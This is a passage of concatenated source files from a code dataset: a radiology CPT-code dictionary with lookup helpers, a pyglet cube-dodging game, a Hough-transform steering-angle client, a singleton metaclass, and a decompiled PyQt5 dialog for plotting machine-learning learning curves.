CAPTOPRIL',\n '78800':'NUCLEAR GALLIUM SCAN with 78803',\n '78804':'NUCLEAR OCTREO SCAN with 78803',\n '78807':'NUCLEAR SCAN FOR INFLAMATION with spect'}\n## PET Dictionary\nRAD_CPT_PET_dict = {'78608': 'PET BRAIN IMAG', \n '78814': 'PET SCAN WITH CT Limited',\n '78815': 'PET SCANN with CT Skull to mid thigh',\n '78816': 'PET SCAN with CT full body'}\n## US Dictionary\nRAD_CPT_US_dict = { '76506': 'U/S EXAM OF HEAD', \n '76536': 'U/S Soft Tissue Neck(thyroid,parathyroid,etc.)',\n '76604': 'U/S CHEST',\n '76641': 'U/S BREAST(uni or bi)',\n '76700': 'U/S ABDOMEN COMPLETE',\n '76705': 'U/S ABDOMEN(limited)',\n '76770': 'U/S RETRO(renal,aorta,nodes)',\n '76775': 'U/S RETRO-limited',\n '76776': 'U/S TRANSPLANTED KIDNEY',\n '76800': 'U/S ECHO EXAM SPINAL CANAL',\n '76801': 'U/S OB FIRST TRIMESTER',\n '76802': 'U/S OB/FIRST TRI/EACH ADD',\n '76805': 'U/S OB-GYN > 14 WEEKS',\n '76810': 'U/S OB > 14 WEEKS/EACH ADD',\n '76811': 'U/S OB MATERN/EVAL&DET EX',\n '76812': 'U/S OB MATERN/EVAL&DET EX/EACH ADD',\n '76813': 'U/S NUCHAL TRANSLUCENCY',\n '76814': 'U/S Nuchal Translucency/EACH ADD',\n '76815': 'U/S OB LIMITED',\n '76816': 'U/S OB LIMITED FOLLOW UP',\n '76817': 'U/S OB TRANSVAG',\n '76830': 'U/S TRANSVAGINAL',\n '76831': 'U/S HYSTEROGRAM WITH DOPPLER',\n '76856': 'U/S PELVIS-NON OB',\n '76857': 'U/S PELVIS-NON OB LIMITED',\n '76870': 'U/S SCROTUM',\n '76870': 'U/S SCROTUM with Doppler 93975',\n '76881': 'U/S EXTREMITY NON VASCULAR',\n '76882': 'U/S EXTREMITY NON VASCULAR LIMITED',\n '93880': 'U/S CAROTID DOPPLER/DUPLEX',\n '93926': 'U/S DUPLEX SCAN LOW EXT ARTERY r/o pseudo',\n '93970': 'U/S VENOUS DUPLEX/EXTREMITY',\n '93971': 'U/S VENOUS DUPLEX/EXTRM/UNILA',\n '93975': 'U/S DOPPLER,ABDOMINAL/PELVIC',\n '93976': 'U/S LIMITED STUDY DUPLEX SCAN',\n '93990': 'U/S DUPLEX SCAN OF HEMODIALYS'}\n## XRAY Dictionary\nRAD_CPT_XRAY_dict = {'70030': 'X-RAY EYE FOR FOREIGN BOD',\n '70100': 'XRAY MANDIBLE < 4 VIEWS',\n '70110': 'X-RAY EXAM OF MANDIBLE 4 VIEWS',\n '70140': 'XRAY FACIAL BONES < 3VIEWS',\n '70150': 'X-RAY FACIAL BONES 3VIEWS',\n '70160': 'XRAY NASAL BONES 3 VIEWS+',\n '70210': 'XRAY SINUSES < 3 VIEWS',\n '70220': 'XRAY SINUSES 3 OR MORE VIEWS',\n '70250': 'XRAY SKULL < 4 VIEWS',\n '70260': 'XRAY SKULL 4VIEWS',\n '70360': 'XRAY NECK SOFT TISSUE',\n '71010': 'XRAY CHEST, ONE VIEW',\n '71020': 'XRAY CHEST, TWO VIEWS',\n '71021': 'XRAY CHEST W/APICAL LORDO',\n '71022': 'XRAY CHEST W/OBLIQUE PROJEC',\n '71023': 'XRAY CHEST W/FLUORO',\n '71030': 'XRAY CHEST 4 VIEWS',\n '71034': 'XRAY CHEST 4 VIEWS W/FLUOROS.',\n '71035': 'XRAY CHEST LATERAL DECUBITUS',\n '71100': 'XRAY RIBS,UNILAT.,TWO VIEWS',\n '71101': 'XRAY RIBS INCL CHEST 3 VI',\n '71110': 'XRAY RIB BILAT 3 VIEWS',\n '71111': 'XRAY RIBS BILATERAL INCL CHEST 4 VI',\n '71120': 'XRAY STERNUM 2 VIEWS',\n '71130': 'XRAY STERNO CLAVI JOINT 3 VIEWS',\n '72010': 'XRAY SPINE, ENTIRE AP & LAT',\n '72020': 'XRAY SPINE ONE VIEW',\n '72040': 'XRAY CERVICAL SPINE < 4 VIEWS',\n '72050': 'XRAY CERVICAL SPINE 4 or 5 VIEWS',\n '72052': 'XRAY SPINE CERV INCL OBLI 6VIEWS',\n '72069': 'XRAY SPINE THORACOLUMBAR SCOLIOSIS',\n '72070': 'XRAY THORACIC SPINE 2 VIEWS',\n '72072': 'XRAY SPINE THORACIC 3 VIE',\n '72074': 'XRAY SPINE THORACIC 4 VIE',\n '72080': 'XRAY SPINE THORACOLUMBAR',\n '72090': 'XRAY SCOLIOSIS STUDY ERECT & SUPINE',\n '72100': 'XRAY LUMBAR SPINE < 4 VIEWS',\n '72110': 'XRAY LUMBAR SPINE 4 VIEWS',\n '72114': 'X-RAY LUMBAR SPINE 6 VIEWS',\n '72120': 'X-RAY LUMBAR SPINE <4 VIEW',\n '72170': 'XRAY PELVIS 1 OR 2 VIEWS',\n '72190': 'XRAY PELVIS 3 VIEWS',\n '72200': 'XRAY SACROILIAC JOINTS < 3 VIEWS',\n '72202': 'XRAY SACROILIAC JOINTS 3VIEW',\n '72220': 'XRAY COCCYX/SACRUM 2VIEWS',\n '73000': 'XRAY CLAVICLE',\n '73010': 'XRAY SCAPULA, COMPLETE',\n '73020': 'XRAY SHOULDER MIN 1 VIEWS',\n '73030': 'XRAY SHOULDER 2 VIEWS',\n '73040': 'XRAY SHOULDER ARTHROGRAPHY',\n '73050': 'X-RAY ACOMIOCLAVICULAR JOINTS',\n '73060': 'XRAY HUMERUS 2 VIEWS',\n '73070': 'XRAY ELBOW TWO VIEWS',\n '73080': 'XRAY ELBOW THREE VIEWS',\n '73085': 'XRAY ELBOW ARTHROGRAPHY',\n '73090': 'XRAY FOREARM TWO VIEWS',\n '73092': 'X-RAY EXAM OF ARM, INFANT',\n '73100': 'XRAY WRIST 2 VIEWS',\n '73110': 'XRAY WRIST MIN 3 VIEWS',\n '73115': 'XRAY WRIST ARTHROGRAPHY',\n '73120': 'XRAY HAND 2 VIEWS',\n '73130': 'XRAY HAND MIN 3 VIEWS',\n '73140': 'XRAY FINGER 2 VIEWS',\n '73500': 'XRAY XRAY HIP 1 VIEW',\n '73510': 'XRAY HIP MIN TWO VIEWS',\n '73520': 'XRAY HIP BILAT TWO VIEWS',\n '73525': 'XRAY HIP ARTHROGRAPHY',\n '73540': 'X-RAY EXAM OF PELVIS INFANT OR CHILD',\n '73550': 'X-RAY FEMUR TWO VIEWS',\n '73560': 'X-RAY KNEE 1 OR 2 VIEWS',\n '73562': 'X-RAY KNEE-3 VIEWS',\n '73564': 'X-RAY EXAM OF KNEE 4 VIEWS',\n '73565': 'X-RAY KNEE,BILATERAL STANDING',\n '73580': 'X-RAY KNEE ARTHROGRAPHY',\n '73590': 'X-RAY TIBIA/FIBULA',\n '73592': 'X-RAY EXAM OF LEG, INFANT',\n '73600': 'X-RAY ANKLE',\n '73610': 'X-RAY ANKLE BILATERAL',\n '73615': 'X-RAY ANKLE ARTHROGRAPHY',\n '73620': 'X-RAY FOOT 2 VIEWS',\n '73630': 'X-RAY FOOT,COMPLETE',\n '73650': 'X-RAY HEEL,TWO VIEWS',\n '73660': 'X-RAY TOE(S)',\n '74000': 'X-RAY ABDOMEN AP VIEW',\n '74010': 'X-RAY EXAM OF ABDOMEN WITH OBLIQUE',\n '74020': 'X-RAY EXAM OF ABDOMEN SUPINE & ERECT',\n '74022': 'X-RAY ABDOMEN COMPLETE WITH AP CHEST',\n '76010': 'X-RAY, NOSE TO RECTUM CHILD',\n '77072': 'X-RAY BONE AGE STUDIES',\n '77073': 'X-RAY BONE LENGTH EVALUATION SCANOGRAM',\n '77074': 'X-RAY BONE SURVEY limited',\n '77075': 'X-RAY BONE SURVEY COMPLETE',\n '77076': 'X-RAY BONE EVALUATION infant',\n '77080': 'X-RAY DEXA/BONE DENSITY STUDY'}\n\n#\n## Useful functions to search 2018 RAD CPT dictionary\n#\n############################################################################\n# Find exact match of a value in a dictionary and return key\n#\ndef find_first_key_exact(input_dict, value):\n return next((k for k, v in input_dict.items() if v== value), None)\n############################################################################\n# Convert a dictionary (keys & value strings) to all lower case characters\n#\ndef lower_dict(d):\n new_dict = dict((k.lower(), v.lower()) for k, v in d.items())\n return new_dict\n############################################################################\n# Convert a dictionary (keys & value strings) to all lower case characters\n#\ndef upper_dict(d):\n new_dict = dict((k.upper(), v.upper()) for k, v in d.items())\n return new_dict\n############################################################################\n# Find value string that contains value and return all possible keys\n# This normalizes the dictionary and value to upper case characters\ndef find_all_keys_containing(input_dict, value):\n upper_case_dict = upper_dict(input_dict)\n return {k for k, v in upper_case_dict.items() if v.find(value.lower()) != -1}\n","sub_path":"sam_2018_cpt_rad.py","file_name":"sam_2018_cpt_rad.py","file_ext":"py","file_size_in_byte":19473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272718275","text":"#!/usr/bin/python\n#cubes 1.03: fixed ending on level 21\n\n#made by markymarc, m.laugharn+cubes@gmail.com\n\nimport pyglet\nfrom pyglet.window import key\nfrom pyglet import clock\nimport rabbyt\nimport random\n\nwindow = pyglet.window.Window(caption=\"Cubes\")\nclock.schedule(rabbyt.add_time)\n\nnextround = pyglet.resource.media(\"next.wav\", streaming=False) #plays usually after clearSprites()\nwin = pyglet.resource.media(\"win.wav\", streaming=False) #plays when base > 30\noops = pyglet.resource.media(\"oops.wav\", streaming=False)\n\nsize = window.get_size()\nrabbyt.set_viewport(size)\nrabbyt.set_default_attribs()\nlabel = pyglet.text.Label('', font_size = size[0]/80, x=size[0]//2, y=size[1]//4, anchor_x = 'center', anchor_y='center')\n\nsprites = []\nmouse = [0,0,0,0]\ndx = size[0]/2\ndt = 0\nlose = False\nbase = 10\nlevel = pyglet.text.Label(\"Round \" + str(base-9), font_size = size[0]/80, x=size[0]//8, y=size[1]//8, anchor_x = 'center', anchor_y='center')\npaused = pyglet.text.Label(\"Paused\", font_size=size[0]/10, x=size[0]//2, y=size[1]//2, anchor_x = 'center', anchor_y='center')\nshapescale = ((-size[0]/64),size[0]/64,size[0]/64,-size[0]/64)\n\ncolors = [(38/255.0,212/255.0,208/255.0),(194/255.0,0,0)] #teal and dark-ish red\n\nwinToggle=False\ninfToggle = False\npauseToggle = False\nvolume = 1.0\nwind = False\nwindValue = 1\n\n@window.event\ndef on_draw():\n global lose\n global mult\n global base\n global dx\n global volume\n global wind\n global windValue\n\n window.clear()\n if lose == False:\n pyglet.clock.schedule_once(update, dt)\n rabbyt.render_unsorted(sprites)\n if sprites ==[]: #put stuff here to make them happen once per round\n if win!= True:\n if volume:nextround.play()\n level.text = \"Round \" + str(base-9)\n base+=1\n dx*=1.05 #ACCELERATE!\n if wind: windValue*=random.choice([-1,1])*1.03\n elif lose == True:\n base = 10\n dx = size[0]/2\n\n if pauseToggle: paused.draw()\n level.draw()\n label.draw()\n\n@window.event\ndef on_mouse_motion(x, y, dx, dy):\n mouse[0]=x\n mouse[1]=y\n\n@window.event\ndef on_key_press(symbol, modifiers):\n global dx\n global lose\n global size\n global shapescale\n global base\n global infToggle\n global winToggle\n global pauseToggle\n global volume\n global wind\n\n if symbol == key.SPACE:\n if lose == True: \n lose = False\n label.text=\"\"\n sprites = []\n level.text = \"Round \" + str(base-9)\n dt = 1\n winToggle = False\n if symbol == key.LEFT:\n dx *=.5\n if symbol == key.RIGHT:\n dx *=2\n if symbol == key.F:\n window.set_fullscreen(fullscreen = not window.fullscreen)\n size = window.get_size()\n shapescale = ((-size[0]/64),size[0]/64,size[0]/64,-size[0]/64)\n level.x, level.y = size[0]//8, size[1]//8\n label.x, label.y = size[0]//2, size[1]//4\n dx = size[1]\n if symbol == key.I:\n infToggle = not infToggle\n if infToggle:\n level.color = (255,0,0,255)\n else:\n level.color = (255,255,255,255)\n if symbol == key.P:\n pauseToggle = not pauseToggle\n if symbol == key.M:\n volume = 1.0 - volume\n if symbol == key.W:\n wind = not wind\n\n@window.event\ndef on_mouse_release(x, y, button, modifiers):\n global dx\n global lose\n global size\n global shapescale\n global base\n global winToggle\n global volume\n\n if button == pyglet.window.mouse.LEFT:\n if lose == True: \n lose = False\n label.text=\"\"\n sprites = []\n level.text = \"Round \" + str(base-9)\n dt = 1\n winToggle = False\n\ndef update(dt):\n global lose\n global sprites\n global base\n global mult\n global shapescale\n global colors\n global oops\n global win\n global winToggle\n global volume\n global wind\n global windValue\n\n if base>29 and infToggle != True: \n dt = 0\n if volume:win.play()\n label.text = \"You win! Do a little dance! Then try again.\"\n winToggle = True\n lose = True\n sprites = [] #clear the sprites\n\n if len(sprites) x1 else -math.pi/2\n else:\n angle = math.atan((x2 - x1) / (y2 - y1))\n\n if verbose:\n print(f\"Angle found: {-angle} rad, {-angle*180/math.pi} degrees\")\n\n # Only keep realistic angles\n if abs(180/math.pi * angle) > self.angle_limit:\n return None\n\n return angle\n\n def _angle(self, lines, normalize=True, verbose=False):\n # Angle between -30 and 30 (-1 and 1)\n\n angles = []\n lengths = []\n if verbose:\n print(\"Lines: \", lines)\n\n for line in lines:\n for x1, y1, x2, y2 in line:\n angle = self._line_angle(x1, y1, x2, y2, verbose=verbose)\n if angle:\n angles.append(angle)\n lengths.append(max(abs(x2-x1), abs(y2-y1)))\n\n if not angles:\n if verbose:\n print(\"No valid angles found\")\n return 0\n\n angles = np.array(angles)\n lengths = np.array(lengths)\n\n weighted_mean_angle = np.sum(angles * lengths) / np.sum(lengths)\n\n a = -180/math.pi * np.mean(weighted_mean_angle)\n\n if normalize:\n a = min(30, max(-30, a)) / 30\n\n return a\n\n def _draw_lines(self, img, lines):\n line_image = np.zeros_like(img)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n color = (255, 0, 0) if self._line_angle(x1, y1, x2, y2) is None else (0, 255, 0)\n cv2.line(line_image,(x1,y1+self.offset),(x2,y2+self.offset),color,5)\n\n dy = 30\n dx = int(dy * math.tan(self._angle(lines)))\n x = img.shape[1] //2\n y = img.shape[0] -1\n\n cv2.arrowedLine(line_image, (x, y), (x+dx, y-dy), (255, 255, 255), 5)\n\n # Draw the lines on the image\n lines_edges = cv2.addWeighted(img, 0.8, line_image, 1, 0)\n\n return lines_edges\n\n def predict_and_draw(self, img):\n lines = self._lines(img)\n if lines is None:\n return self._last_angle\n\n angle = self._angle(lines)\n\n self._last_angle = angle\n\n return angle, self._draw_lines(img, lines)\n\n\nclass HoughClient(AbstractClient):\n def __init__(self, host, rate, **kwargs):\n super(HoughClient, self).__init__(host, rate)\n self.estimator = AngleEstimator(**kwargs)\n\n def process(self, image):\n ang, draw = self.estimator.predict_and_draw(image)\n return ang, self.cv2encode(draw)\n\n\nif __name__ == \"__main__\":\n HoughClient.bootstrap(0.2)\n","sub_path":"clients/hough_client.py","file_name":"hough_client.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606155022","text":"\"\"\"\r\nCopyright 2021 Daniel Afriyie\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n https://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\n\r\n\r\nclass SingletonMeta(type):\r\n \"\"\"\r\n Singleton metaclass: restricts the instantiation of a class to one object\r\n \"\"\"\r\n __instances = {}\r\n\r\n def __call__(cls, *args, **kwargs):\r\n if cls not in cls.__instances:\r\n cls.__instances[cls] = super().__call__(*args, **kwargs)\r\n return cls.__instances[cls]\r\n","sub_path":"raccy/core/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10705809","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\HDi\\Google Drive\\ProgramCodes\\PythonCodes\\cognitivegeo\\src\\gui\\plotmllearncurve.py\n# Compiled at: 2020-03-17 16:23:40\n# Size of source mod 2**32: 22583 bytes\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport os, sys, numpy as np, matplotlib.pyplot as plt\nsys.path.append(os.path.dirname(__file__)[:-4][:-4][:-13])\nfrom cognitivegeo.src.basic.data import data as basic_data\nfrom cognitivegeo.src.core.settings import settings as core_set\nfrom cognitivegeo.src.vis.font import font as vis_font\nfrom cognitivegeo.src.gui.configlineplotting import configlineplotting as gui_configlineplotting\nfrom cognitivegeo.src.vis.messager import messager as vis_msg\nQtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)\nQtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\nclass plotmllearncurve(object):\n learnmat = []\n linestyle = core_set.Visual['Line']\n fontstyle = core_set.Visual['Font']\n iconpath = os.path.dirname(__file__)\n dialog = None\n lineplottingconfig = {}\n\n def setupGUI(self, PlotMlLearnCurve):\n PlotMlLearnCurve.setObjectName('PlotMlLearnCurve')\n PlotMlLearnCurve.setFixedSize(420, 270)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/plotcurve.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n PlotMlLearnCurve.setWindowIcon(icon)\n self.lblselect = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblselect.setObjectName('lblselect')\n self.lblselect.setGeometry(QtCore.QRect(10, 10, 60, 30))\n self.lblprocess = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblprocess.setObjectName('lblprocess')\n self.lblprocess.setGeometry(QtCore.QRect(10, 50, 60, 30))\n self.cbbprocess = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbbprocess.setObjectName('cbbprocess')\n self.cbbprocess.setGeometry(QtCore.QRect(70, 50, 100, 30))\n self.lblcurve = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblcurve.setObjectName('lblcurve')\n self.lblcurve.setGeometry(QtCore.QRect(10, 90, 60, 30))\n self.cbbcurve = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbbcurve.setObjectName('cbbcurve')\n self.cbbcurve.setGeometry(QtCore.QRect(70, 90, 100, 30))\n self.btnconfigline = QtWidgets.QPushButton(PlotMlLearnCurve)\n self.btnconfigline.setObjectName('btnconfigline')\n self.btnconfigline.setGeometry(QtCore.QRect(270, 10, 120, 30))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/settings.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.btnconfigline.setIcon(icon)\n self.lblepoch = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblepoch.setObjectName('lblepoch')\n self.lblepoch.setGeometry(QtCore.QRect(210, 50, 60, 30))\n self.ldtepochmin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtepochmin.setObjectName('ldtepochmin')\n self.ldtepochmin.setGeometry(QtCore.QRect(270, 50, 50, 30))\n self.ldtepochmin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtepochmax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtepochmax.setObjectName('ldtepochmax')\n self.ldtepochmax.setGeometry(QtCore.QRect(340, 50, 50, 30))\n self.ldtepochmax.setAlignment(QtCore.Qt.AlignCenter)\n self.lblepochrangeto = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblepochrangeto.setObjectName('lblepochrangeto')\n self.lblepochrangeto.setGeometry(QtCore.QRect(320, 50, 20, 30))\n self.lblepochrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lblaccuracy = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblaccuracy.setObjectName('lblaccuracy')\n self.lblaccuracy.setGeometry(QtCore.QRect(210, 90, 60, 30))\n self.ldtaccuracymin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtaccuracymin.setObjectName('ldtaccuracymin')\n self.ldtaccuracymin.setGeometry(QtCore.QRect(270, 90, 50, 30))\n self.ldtaccuracymin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtaccuracymax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtaccuracymax.setObjectName('ldtaccuracymax')\n self.ldtaccuracymax.setGeometry(QtCore.QRect(340, 90, 50, 30))\n self.ldtaccuracymax.setAlignment(QtCore.Qt.AlignCenter)\n self.lblaccuracyrangeto = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblaccuracyrangeto.setObjectName('lblaccuracyrangeto')\n self.lblaccuracyrangeto.setGeometry(QtCore.QRect(320, 90, 20, 30))\n self.lblaccuracyrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lblloss = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lblloss.setObjectName('lblloss')\n self.lblloss.setGeometry(QtCore.QRect(210, 130, 60, 30))\n self.ldtlossmin = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtlossmin.setObjectName('ldtlossmin')\n self.ldtlossmin.setGeometry(QtCore.QRect(270, 130, 50, 30))\n self.ldtlossmin.setAlignment(QtCore.Qt.AlignCenter)\n self.ldtlossmax = QtWidgets.QLineEdit(PlotMlLearnCurve)\n self.ldtlossmax.setObjectName('ldtlossmax')\n self.ldtlossmax.setGeometry(QtCore.QRect(340, 130, 50, 30))\n self.ldtlossmax.setAlignment(QtCore.Qt.AlignCenter)\n self.lbllossrangeto = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lbllossrangeto.setObjectName('lbllossrangeto')\n self.lbllossrangeto.setGeometry(QtCore.QRect(320, 130, 20, 30))\n self.lbllossrangeto.setAlignment(QtCore.Qt.AlignCenter)\n self.lbllegend = QtWidgets.QLabel(PlotMlLearnCurve)\n self.lbllegend.setObjectName('lbllegend')\n self.lbllegend.setGeometry(QtCore.QRect(210, 170, 60, 30))\n self.cbblegend = QtWidgets.QComboBox(PlotMlLearnCurve)\n self.cbblegend.setObjectName('cbblegend')\n self.cbblegend.setGeometry(QtCore.QRect(270, 170, 120, 30))\n self.btnapply = QtWidgets.QPushButton(PlotMlLearnCurve)\n self.btnapply.setObjectName('btnapply')\n self.btnapply.setGeometry(QtCore.QRect(130, 220, 160, 30))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(os.path.join(self.iconpath, 'icons/ok.png')), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.btnapply.setIcon(icon)\n self.msgbox = QtWidgets.QMessageBox(PlotMlLearnCurve)\n self.msgbox.setObjectName('msgbox')\n _center_x = PlotMlLearnCurve.geometry().center().x()\n _center_y = PlotMlLearnCurve.geometry().center().y()\n self.msgbox.setGeometry(QtCore.QRect(_center_x - 150, _center_y - 50, 300, 100))\n self.retranslateGUI(PlotMlLearnCurve)\n QtCore.QMetaObject.connectSlotsByName(PlotMlLearnCurve)\n\n def retranslateGUI(self, PlotMlLearnCurve):\n self.dialog = PlotMlLearnCurve\n _translate = QtCore.QCoreApplication.translate\n PlotMlLearnCurve.setWindowTitle(_translate('PlotMlLearnCurve', 'Plot Learning Curve'))\n self.lblselect.setText(_translate('PlotMlLearnCurve', 'Select:'))\n self.lblprocess.setText(_translate('PlotMlLearnCurve', 'Process:'))\n self.cbbprocess.addItems(['Training', 'Validation', 'Both'])\n self.cbbprocess.currentIndexChanged.connect(self.changeCbbProcessCurve)\n self.lblcurve.setText(_translate('PlotMlLearnCurve', 'Curve:'))\n self.cbbcurve.addItems(['Accuracy', 'Loss', 'Both'])\n self.cbbcurve.currentIndexChanged.connect(self.changeCbbProcessCurve)\n self.btnconfigline.setText(_translate('PlotMlLearnCurve', 'Configuration'))\n self.btnconfigline.clicked.connect(self.clickBtnConfigLine)\n self.lblepoch.setText(_translate('PlotMlLearnCurve', 'Epoch:'))\n self.lblepochrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lblaccuracy.setText(_translate('PlotMlLearnCurve', 'Accuracy:'))\n self.lblaccuracyrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lblloss.setText(_translate('PlotMlLearnCurve', 'Loss:'))\n self.lbllossrangeto.setText(_translate('PlotMlLearnCurve', '~~'))\n self.lbllegend.setText(_translate('PlotMlLearnCurve', 'Legend:'))\n self.cbblegend.addItems(['On', 'Off'])\n self.btnapply.setText(_translate('PlotMlLearnCurve', 'Apply'))\n self.btnapply.setDefault(True)\n self.btnapply.clicked.connect(self.clickBtnApply)\n self.lineplottingconfig['Training accuracy'] = core_set.Visual['Line']\n if np.ndim(self.learnmat) >= 2:\n if np.shape(self.learnmat)[1] >= 5:\n self.ldtepochmin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 0]))))\n self.ldtepochmax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 0]))))\n self.ldtaccuracymin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 1:3]))))\n self.ldtaccuracymax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 1:3]))))\n self.ldtlossmin.setText(_translate('PlotMlLearnCurve', str(np.min(self.learnmat[:, 3:5]))))\n self.ldtlossmax.setText(_translate('PlotMlLearnCurve', str(np.max(self.learnmat[:, 3:5]))))\n\n def changeCbbProcessCurve(self):\n _curvelist = []\n if self.cbbprocess.currentIndex() == 0:\n _curvelist = [\n 'Training']\n if self.cbbprocess.currentIndex() == 1:\n _curvelist = [\n 'Validation']\n if self.cbbprocess.currentIndex() == 2:\n _curvelist = [\n 'Training', 'Validation']\n if self.cbbcurve.currentIndex() == 0:\n _curvelist = [_curve + ' accuracy' for _curve in _curvelist]\n if self.cbbcurve.currentIndex() == 1:\n _curvelist = [_curve + ' loss' for _curve in _curvelist]\n if self.cbbcurve.currentIndex() == 2:\n _curvelist = [_curve + ' accuracy' for _curve in _curvelist] + [_curve + ' loss' for _curve in _curvelist]\n _config = {}\n for _curve in _curvelist:\n if _curve in self.lineplottingconfig.keys():\n _config[_curve] = self.lineplottingconfig[_curve]\n else:\n _config[_curve] = core_set.Visual['Line']\n\n self.lineplottingconfig = _config\n\n def clickBtnConfigLine(self):\n _config = QtWidgets.QDialog()\n _gui = gui_configlineplotting()\n _gui.lineplottingconfig = self.lineplottingconfig\n _gui.setupGUI(_config)\n _config.exec()\n self.lineplottingconfig = _gui.lineplottingconfig\n _config.show()\n\n def clickBtnApply(self):\n self.refreshMsgBox()\n if np.ndim(self.learnmat) < 2 or np.shape(self.learnmat)[1] < 5:\n vis_msg.print('ERROR in PlotMlLearnCurve: Wrong learning matrix', type='error')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Wrong learning matrix')\n return\n if self.cbbprocess.currentIndex() == 0:\n processtype = 1\n if self.cbbprocess.currentIndex() == 1:\n processtype = -1\n if self.cbbprocess.currentIndex() == 2:\n processtype = 0\n if self.cbbcurve.currentIndex() == 0:\n curvetype = 1\n if self.cbbcurve.currentIndex() == 1:\n curvetype = -1\n if self.cbbcurve.currentIndex() == 2:\n curvetype = 0\n epochmin = basic_data.str2float(self.ldtepochmin.text())\n epochmax = basic_data.str2float(self.ldtepochmax.text())\n if epochmin is False or epochmax is False:\n print('PlotMlLearnCurve: Non-float epoch range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float epoch range')\n return\n accuracymin = basic_data.str2float(self.ldtaccuracymin.text())\n accuracymax = basic_data.str2float(self.ldtaccuracymax.text())\n if curvetype >= 0:\n if accuracymin is False or accuracymax is False:\n print('PlotMlLearnCurve: Non-float accuracy range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float accuracy range')\n return\n lossmin = basic_data.str2float(self.ldtlossmin.text())\n lossmax = basic_data.str2float(self.ldtlossmax.text())\n if curvetype <= 0:\n if lossmin is False or lossmax is False:\n print('PlotMlLearnCurve: Non-float loss range')\n QtWidgets.QMessageBox.critical(self.msgbox, 'Plot Learning Curve', 'Non-float loss range')\n return\n if self.cbblegend.currentIndex() == 0:\n legendon = True\n if self.cbblegend.currentIndex() == 1:\n legendon = False\n self.plotLearningCurve(processtype=processtype, curvetype=curvetype, epochlim=[\n epochmin, epochmax],\n accuracylim=[\n accuracymin, accuracymax],\n losslim=[\n lossmin, lossmax],\n fontstyle=(self.fontstyle),\n legendon=legendon)\n\n def refreshMsgBox(self):\n _center_x = self.dialog.geometry().center().x()\n _center_y = self.dialog.geometry().center().y()\n self.msgbox.setGeometry(QtCore.QRect(_center_x - 150, _center_y - 50, 300, 100))\n\n def plotLearningCurve(self, processtype=0, curvetype=0, epochlim=[\n 0, 10], accuracylim=[\n 0, 1.0], losslim=[\n 0, 10], fontstyle=None, legendon=True):\n vis_font.updatePltFont(fontstyle)\n fig, ax1 = plt.subplots()\n fig.patch.set_facecolor('white')\n ax1.set_xlabel('Epochs')\n ax1.set_xlim([min(self.learnmat[:, 0]), max(self.learnmat[:, 0])])\n if curvetype >= 0:\n ax1.set_ylabel('Accuracy')\n else:\n ax1.set_ylabel('Loss')\n if curvetype == 0:\n ax2 = ax1.twinx()\n ax2.set_ylabel('Loss')\n if processtype >= 0:\n if curvetype >= 0:\n k_line, = ax1.plot((self.learnmat[:, 0]), (self.learnmat[:, 1]), color=(self.lineplottingconfig['Training accuracy']['Color'].lower()),\n linewidth=(self.lineplottingconfig['Training 